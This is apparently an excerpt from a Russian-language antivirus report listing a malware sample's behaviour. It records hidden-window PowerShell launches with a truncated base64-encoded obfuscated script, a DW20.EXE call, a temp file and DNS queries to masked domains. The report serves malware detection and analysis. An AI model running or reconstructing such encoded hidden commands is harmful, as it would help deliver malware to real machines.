Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAG8AdwBnAGcAYgB3AGIAaQBhAG0AYgBnAD0AJwBCAHcAdAB2AGYAeAB3AHAAaABlAHIAaAAnADsAJABJAG4AYgByAGUAdgBuAGkAagAgAD0AIAAnADcANwAwACcAOwAkAEgAdABrAHgAYwBrAGMAYwBkAHkAPQAnAEsAZwB2AGwAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\1365476.cvr
- DNS ASK 18#####30.tbmyoweb.com
- DNS ASK bt##ndy.in
- DNS ASK bu######.podcastwebsites.com
- DNS ASK 36##an.com
- DNS ASK bo##go.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAG8AdwBnAGcAYgB3AGIAaQBhAG0AYgBnAD0AJwBCAHcAdAB2AGYAeAB3AHAAaABlAHIAaAAnADsAJABJAG4AYgByAGUAdgBuAGkAagAgAD0AIAAnADcANwAwACcAOwAkAEgAdABrAHgAYwBrAGMAYwBkAHkAPQAnAEsAZwB2AGwAdgB...' (со скрытым окном)